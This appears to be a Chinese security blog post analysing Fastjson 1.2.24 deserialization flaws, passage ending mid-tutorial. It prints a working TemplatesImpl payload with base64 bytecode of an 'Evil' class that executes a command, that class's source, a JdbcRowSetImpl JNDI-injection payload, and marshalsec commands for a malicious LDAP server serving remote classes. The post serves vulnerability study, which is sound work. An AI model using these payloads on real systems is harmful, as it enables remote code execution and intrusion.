<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"><meta name="theme-color" content="#222"><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"><link rel="alternate" href="/rss.xml" title="保持谦逊" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="保持谦逊" type="application/atom+xml"><link rel="alternate" type="application/json" title="保持谦逊" href="http://example.com/feed.json"><link rel="preconnect" href="https://lf9-cdn-tos.bytecdntp.com"><link rel="preconnect" href="https://at.alicdn.com"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&amp;display=swap&amp;subset=latin,latin-ext" media="none" onload="this.media='all'"><link rel="stylesheet" href="/css/app.css?v=0.4.4"><link rel="modulepreload" href="/js/chunk-AQJDXJYY.js"><link rel="modulepreload" href="/js/chunk-ICONY7DL.js"><link rel="modulepreload" href="/js/chunk-P6MM2YDM.js"><link rel="modulepreload" href="/js/chunk-R4V4O42L.js"><link rel="modulepreload" href="/js/index.esm-MXM77TKH.js"><link rel="modulepreload" href="/js/post-LRTLKV55.js"><link rel="modulepreload" href="/js/quicklink-SMLSC7AY.js"><link rel="modulepreload" href="/js/search-IDGSJYRG.js"><link rel="modulepreload" href="/js/siteInit.js"><link rel="preload" href="https://i.imgtg.com/2023/03/09/Y0zdB.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://i.imgtg.com/2023/03/09/Y0xvg.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://i.imgtg.com/2023/03/09/Y0kTl.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://i.imgtg.com/2023/03/09/Y0hOs.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://i.imgtg.com/2023/03/09/YS6XY.jpg" as="image" fetchpriority="high"><link rel="preload" href="https://i.imgtg.com/2023/03/09/YSIlc.jpg" as="image" fetchpriority="high"><meta name="description" content="这个人很懒，什么都不愿说"><link rel="canonical" href="http://example.com/2024/06/26/Fastjson-Deserialize/"><title>Fastjson-Deserialize</title><meta name="generator" content="Hexo 7.2.0"></head><body itemscope="" itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope="" itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">Fastjson-Deserialize</h1><div class="meta"><span class="item" title="创建时间：2024-06-26 11:43:51"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">发表于</span><time itemprop="dateCreated datePublished" datetime="2024-06-26T11:43:51+08:00">2024-06-26</time></span><span class="item" title="本文字数"><span class="icon"><i class="ic i-pen"></i></span><span class="text">本文字数</span><span>15k</span><span class="text">字</span></span><span class="item" title="阅读时长"><span class="icon"><i class="ic i-clock"></i></span><span class="text">阅读时长</span><span>13 分钟</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="切换导航栏"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">Y1 h40vv3n</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><ul><li class="item" style="background-image: url(&quot;https://i.imgtg.com/2023/03/09/Y0zdB.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://i.imgtg.com/2023/03/09/Y0xvg.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://i.imgtg.com/2023/03/09/Y0kTl.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://i.imgtg.com/2023/03/09/Y0hOs.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://i.imgtg.com/2023/03/09/YS6XY.jpg&quot;);"></li><li class="item" style="background-image: url(&quot;https://i.imgtg.com/2023/03/09/YSIlc.jpg&quot;);"></li></ul></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemlistelement="" itemscope="" itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">首页</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-CN"><link itemprop="mainEntityOfPage" href="http://example.com/2024/06/26/Fastjson-Deserialize/"><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"><meta itemprop="name" content="h40vv3n"><meta itemprop="description" content=", 这个人很懒，什么都不愿说"></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="保持谦逊"></span><div class="body md" itemprop="articleBody"><h3 id="fastjson-1224"><a class="anchor" href="#fastjson-1224">#</a> Fastjson-1.2.24</h3>
<blockquote>
<p>影响版本： <code>fastjson &lt;= 1.2.24</code>  描述：fastjson 默认使用  <code>@type</code>  指定反序列化任意类，攻击者可以通过在 Java 常见环境中寻找能够构造恶意类的方法，通过反序列化的过程中调用的 getter/setter 方法，以及目标成员变量的注入来达到传参的目的，最终形成恶意调用链。</p>
</blockquote>
<p>payload:</p>
<figure class="highlight json"><figcaption data-lang="JSON"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>	<span class="token property">"@type"</span><span class="token operator">:</span> <span class="token string">"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="3"></td><td><pre>	<span class="token property">"_bytecodes"</span><span class="token operator">:</span> <span class="token punctuation">[</span><span class="token string">"yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYHAB8BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAIAAkHACEMACIAIwEABGNhbGMMACQAJQEAHWNvbS9leGFtcGxlL2Zhc3Rqc29uZGVtby9FdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAAAuAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAEACwAAAA4AAwAAAAwABAANAA0ADgAMAAAABAABAA0AAQAOAA8AAgAKAAAAGQAAAAMAAAABsQAAAAEACwAAAAYAAQAAABIADAAAAAQAAQAQAAEADgARAAIACgAAABkAAAAEAAAAAbEAAAABAAsAAAAGAAEAAAAWAAwAAAAEAAEAEAAJABIAEwACAAoAAAAlAAIAAgAAAAm7AAVZtwAGTLEAAAABAAsAAAAKAAIAAAAYAAgAGQAMAAAABAABABQAAQAVAAAAAgAW"</span><span class="token punctuation">]</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="4"></td><td><pre>	<span class="token property">"_name"</span><span class="token operator">:</span> <span class="token string">"h40vv3n"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="5"></td><td><pre>	<span class="token property">"_tfactory"</span><span class="token operator">:</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="6"></td><td><pre>	<span class="token property">"_outputProperties"</span><span class="token operator">:</span> <span class="token punctuation">{</span><span class="token punctuation">}</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><h4 id="templatesimpl反序列化"><a class="anchor" href="#templatesimpl反序列化">#</a> TemplatesImpl 反序列化</h4>
<h5 id="漏洞分析"><a class="anchor" href="#漏洞分析">#</a> 漏洞分析</h5>
<p>TemplatesImpl 类位于 <code>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.java</code></p>
<p>其实现了 Serializable 接口，因此可被序列化，查看该文件，寻找漏洞点</p>
<p>在 <code>getTransletInstance()</code>  方法中，发现了利用点，成员属性 <code>_class</code>  是一个 Class 类型的数组，下标为 <code>_transletIndex</code>  的类会使用 <code>newInstance()</code>  方法进行实例化</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617203054954.webp" class="" title="image-20240617203054954"></p>
<p>如果 <code>_class</code>  中 <code>_transletIndex</code>  的类可控的话，就能够进行利用了，继续查找赋值的地方</p>
<p>在 <code>defineTransletClasses()</code>  方法中对其进行了赋值的操作，为了成功执行到该处，要保证 <code>_bytecodes</code>  的值不为空，该变量是成员属性，可以控制，到了下面就会将 <code>_bytecodes</code>  中的类加载并传入 <code>_class</code>  中索引为 <code>i</code>  的位置，当该类的父类为 <code>ABSTRACT_TRANSLET</code>  时， <code>_transletIndex</code>  的值就为 <code>i</code>  的值，所以到目前位置，可以利用必要条件都能满足</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617204431811.webp" class="" title="image-20240617204431811"></p>
<p>而在 <code>getTransletInstance()</code>  方法中，只要成员属性 <code>_class</code>  的值为 null 即可执行 <code>defineTransletClasses()</code>  方法，这里也是可控的。接下来要寻找调用 <code>getTransletInstance()</code>  方法的地方</p>
<p>在下面的 <code>newTransformer()</code>  方法中调用了 <code>getTransletInstance()</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617205702806.webp" class="" title="image-20240617205702806"></p>
<p>继续寻找调用链，在下面的 <code>getOutputProperties()</code>  方法中调用了 <code>newTransformer()</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617205848456.webp" class="" title="image-20240617205848456"></p>
<p>而 <code>getOutputProperties()</code>  方法是成员属性 <code>_outputProperties</code>  的 <code>getter</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617210331578.webp" class="" title="image-20240617210331578"></p>
<p>此时不知道具体运行途中是否会调用 <code>getOutputProperties()</code>  方法，打上断点进行调试看看</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617212312321.webp" class="" title="image-20240617212312321"></p>
<p>调试到给 token 赋值之后继续跟进</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617221513701.webp" class="" title="image-20240617221513701"></p>
<p>跟进 <code>getDeserializer()</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617221622655.webp" class="" title="image-20240617221622655"></p>
<p>继续跟进 <code>createJavaBeanDeserializer()</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617221708298.webp" class="" title="image-20240617221708298"></p>
<p>再跟进 <code>JavaBeanInfo.build()</code>  方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617221834456.webp" class="" title="image-20240617221834456"></p>
<p>跟进来后发现会获取到类中全部的方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617222133511.webp" class="" title="image-20240617222133511"></p>
<p>运行到此处会将方法逐一取出并进行诸多条件的判断，此时正在进行对 <code>getOutputProperties()</code>  方法的判断</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617222356625.webp" class="" title="image-20240617222356625"></p>
<p>继续运行发现满足条件并且会将与该方法相关的一些信息加入到 <code>fieldList</code>  中</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617223025805.webp" class="" title="image-20240617223025805"></p>
<p>再往后调试发现的确运行了我们构造的恶意类中的命令</p>
<p>因此该漏洞的完整调用链为：</p>
<p><code>getOutputProperties() -&gt; newTransformer() -&gt; getTransletInstance() -&gt; defineTransletClasses() -&gt; EvilClass.newInstance()</code></p>
<p>为了保证程序中途不报异常，还需保证 <code>_outputProperties</code> 、 <code>_indentNumber</code> 、 <code>_tfactory</code>  的值不为 null</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617232124666.webp" class="" title="image-20240617232124666"></p>
<p>而 <code>_indentNumber</code>  的值默认为 0，可以不用设置</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617232309487.webp" class="" title="image-20240617232309487"></p>
<p>而 <code>_outputProperties</code> 、 <code>_tfactory</code>  的值在不设置时是为 null，因此需要在 payload 中加上</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617232413238.webp" class="" title="image-20240617232413238"></p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617232438395.webp" class="" title="image-20240617232438395"></p>
<p>并且 payload 中更改的私有变量部分没有 <code>setter</code>  方法，因此在进行反序列化时需要设置</p>
<p><code>Feature.SupportNonPublicField</code>  参数</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240617232746279.webp" class="" title="image-20240617232746279"></p>
<h5 id="恶意类字节码构造"><a class="anchor" href="#恶意类字节码构造">#</a> 恶意类字节码构造</h5>
<p>编写一个恶意类<mark> Evil.java</mark>:</p>
<figure class="highlight java"><figcaption data-lang="java"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token keyword">package</span> <span class="token namespace">com<span class="token punctuation">.</span>example<span class="token punctuation">.</span>fastjsondemo</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="2"></td><td><pre></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token keyword">import</span> <span class="token import"><span class="token namespace">com<span class="token punctuation">.</span>sun<span class="token punctuation">.</span>org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>xalan<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>xsltc<span class="token punctuation">.</span></span><span class="token class-name">DOM</span></span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token keyword">import</span> <span class="token import"><span class="token namespace">com<span class="token punctuation">.</span>sun<span class="token punctuation">.</span>org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>xalan<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>xsltc<span class="token punctuation">.</span></span><span class="token class-name">TransletException</span></span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token keyword">import</span> <span class="token import"><span class="token namespace">com<span class="token punctuation">.</span>sun<span class="token punctuation">.</span>org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>xalan<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>xsltc<span class="token punctuation">.</span>runtime<span class="token punctuation">.</span></span><span class="token class-name">AbstractTranslet</span></span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">import</span> <span class="token import"><span class="token namespace">com<span class="token punctuation">.</span>sun<span class="token punctuation">.</span>org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>xml<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>dtm<span class="token punctuation">.</span></span><span class="token class-name">DTMAxisIterator</span></span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token keyword">import</span> <span class="token import"><span class="token namespace">com<span class="token punctuation">.</span>sun<span class="token punctuation">.</span>org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>xml<span class="token punctuation">.</span>internal<span class="token punctuation">.</span>serializer<span class="token punctuation">.</span></span><span class="token class-name">SerializationHandler</span></span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token keyword">import</span> <span class="token import"><span class="token namespace">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span></span><span class="token class-name">IOException</span></span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">Evil</span> <span class="token keyword">extends</span> <span class="token class-name">AbstractTranslet</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="12"></td><td><pre>    <span class="token keyword">public</span> <span class="token class-name">Evil</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">IOException</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="13"></td><td><pre>        <span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"calc"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="14"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="15"></td><td><pre>    <span class="token annotation punctuation">@Override</span></pre></td></tr><tr><td data-num="16"></td><td><pre>    <span class="token keyword">public</span> <span class="token keyword">void</span> <span class="token function">transform</span><span class="token punctuation">(</span><span class="token class-name">DOM</span> document<span class="token punctuation">,</span> <span class="token class-name">SerializationHandler</span><span class="token punctuation">[</span><span class="token punctuation">]</span> handlers<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">TransletException</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="17"></td><td><pre></pre></td></tr><tr><td data-num="18"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="19"></td><td><pre>    <span class="token annotation punctuation">@Override</span></pre></td></tr><tr><td data-num="20"></td><td><pre>    <span class="token keyword">public</span> <span class="token keyword">void</span> <span class="token function">transform</span><span class="token punctuation">(</span><span class="token class-name">DOM</span> document<span class="token punctuation">,</span> <span class="token class-name">DTMAxisIterator</span> iterator<span class="token punctuation">,</span> <span class="token class-name">SerializationHandler</span> handler<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">TransletException</span> <span class="token punctuation">{</span></pre></td></tr><tr><td data-num="21"></td><td><pre></pre></td></tr><tr><td data-num="22"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="23"></td><td><pre>    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token class-name">String</span><span class="token punctuation">[</span><span class="token punctuation">]</span> args<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">Exception</span><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="24"></td><td><pre>        <span class="token class-name">Evil</span> e <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Evil</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="25"></td><td><pre>    <span class="token punctuation">}</span></pre></td></tr><tr><td data-num="26"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><p>使用 <code>javac Evil.java</code>  编译成.class 文件</p>
<p>使用如下 python 脚本输出对应的类字节 base64 编码：</p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token keyword">import</span> base64</pre></td></tr><tr><td data-num="2"></td><td><pre></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">r"Evil.class"</span><span class="token punctuation">,</span> <span class="token string">"rb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> <span class="token builtin">file</span><span class="token punctuation">:</span></pre></td></tr><tr><td data-num="4"></td><td><pre>    classbyte <span class="token operator">=</span> base64<span class="token punctuation">.</span>b64encode<span class="token punctuation">(</span><span class="token builtin">file</span><span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span>classbyte<span class="token punctuation">)</span></pre></td></tr></tbody></table></figure><p>因此最终的 payload 为：</p>
<figure class="highlight json"><figcaption data-lang="JSON"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>	<span class="token property">"@type"</span><span class="token operator">:</span> <span class="token string">"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="3"></td><td><pre>	<span class="token property">"_bytecodes"</span><span class="token operator">:</span> <span class="token punctuation">[</span><span class="token string">"yv66vgAAADQAJgoABwAXCgAYABkIABoKABgAGwcAHAoABQAXBwAdAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACkV4Y2VwdGlvbnMHAB4BAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYHAB8BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYHACABAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAIAAkHACEMACIAIwEABGNhbGMMACQAJQEAHWNvbS9leGFtcGxlL2Zhc3Rqc29uZGVtby9FdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAAAuAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAEACwAAAA4AAwAAAAwABAANAA0ADgAMAAAABAABAA0AAQAOAA8AAgAKAAAAGQAAAAMAAAABsQAAAAEACwAAAAYAAQAAABIADAAAAAQAAQAQAAEADgARAAIACgAAABkAAAAEAAAAAbEAAAABAAsAAAAGAAEAAAAWAAwAAAAEAAEAEAAJABIAEwACAAoAAAAlAAIAAgAAAAm7AAVZtwAGTLEAAAABAAsAAAAKAAIAAAAYAAgAGQAMAAAABAABABQAAQAVAAAAAgAW"</span><span class="token punctuation">]</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="4"></td><td><pre>	<span class="token property">"_name"</span><span class="token operator">:</span> <span class="token string">"h40vv3n"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="5"></td><td><pre>	<span class="token property">"_tfactory"</span><span class="token operator">:</span> <span class="token punctuation">{</span><span class="token punctuation">}</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="6"></td><td><pre>	<span class="token property">"_outputProperties"</span><span class="token operator">:</span> <span class="token punctuation">{</span><span class="token punctuation">}</span></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><h4 id="jdbcrowsetimpl反序列化"><a class="anchor" href="#jdbcrowsetimpl反序列化">#</a> JdbcRowSetImpl 反序列化</h4>
<p>JdbcRowSetImpl 类位于 <code>com.sun.rowset.JdbcRowSetImpl</code> ，这条漏洞利用链</p>
<p>是  <code>javax.naming.InitialContext.lookup()</code>  参数可控导致的 JNDI 注入</p>
<p>进入到相关文件查看漏洞点，只要 <code>this.conn</code>  为空则会调用 <code>lookup()</code>  方法，参数为方法 <code>this.getDataSourceName()</code>  的返回值，而该方法正是成员属性 <code>dataSourceName</code>  的 getter 方法，因此可控</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618102841321.webp" class="" title="image-20240618102841321"></p>
<p>查找调用 <code>connect()</code>  方法的函数，找到了 <code>setAutoCommit()</code>  方法，该方法是成员属性 <code>autoCommit</code>  的 setter 方法，因此 payload 中设置 <code>autoCommit</code>  的值即可触发该方法</p>
<p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618103317593.webp" class="" title="image-20240618103317593"></p>
<p>因此最终的 payload 为：</p>
<figure class="highlight json"><figcaption data-lang="JSON"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token punctuation">{</span></pre></td></tr><tr><td data-num="2"></td><td><pre>	<span class="token property">"@type"</span><span class="token operator">:</span><span class="token string">"com.sun.rowset.JdbcRowSetImpl"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="3"></td><td><pre>	<span class="token property">"dataSourceName"</span><span class="token operator">:</span><span class="token string">"ldap://localhost:1389/Exploit"</span><span class="token punctuation">,</span></pre></td></tr><tr><td data-num="4"></td><td><pre>	<span class="token property">"autoCommit"</span><span class="token operator">:</span><span class="token boolean">true</span></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token punctuation">}</span></pre></td></tr></tbody></table></figure><h5 id="使用marshalsec构建ldap服务"><a class="anchor" href="#使用marshalsec构建ldap服务">#</a> 使用 marshalsec 构建 ldap 服务</h5>
<p>将相关文件 git 下来：</p>
<p><code>git clone git@github.com:mbechler/marshalsec.git</code></p>
<p>mvn 编译成 jar 包：</p>
<p><code>mvn clean package -DskipTests</code></p>
<p>最后在 target 目录下会生成<mark> marshalsec-0.0.3-SNAPSHOT-all.jar</mark></p>
<p>启动命令：</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tbody><tr><td data-num="1"></td><td><pre><span class="token function">java</span> <span class="token parameter variable">-cp</span> marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8081/<span class="token comment">#Exploit</span></pre></td></tr></tbody></table></figure><p><img loading="lazy" data-src="/2024/06/26/Fastjson-Deserialize/image-20240618104301245.webp" class="" title="image-20240618104301245"></p>
<p>在相同的目录下编写恶意类并编译成.class 文件：</p>
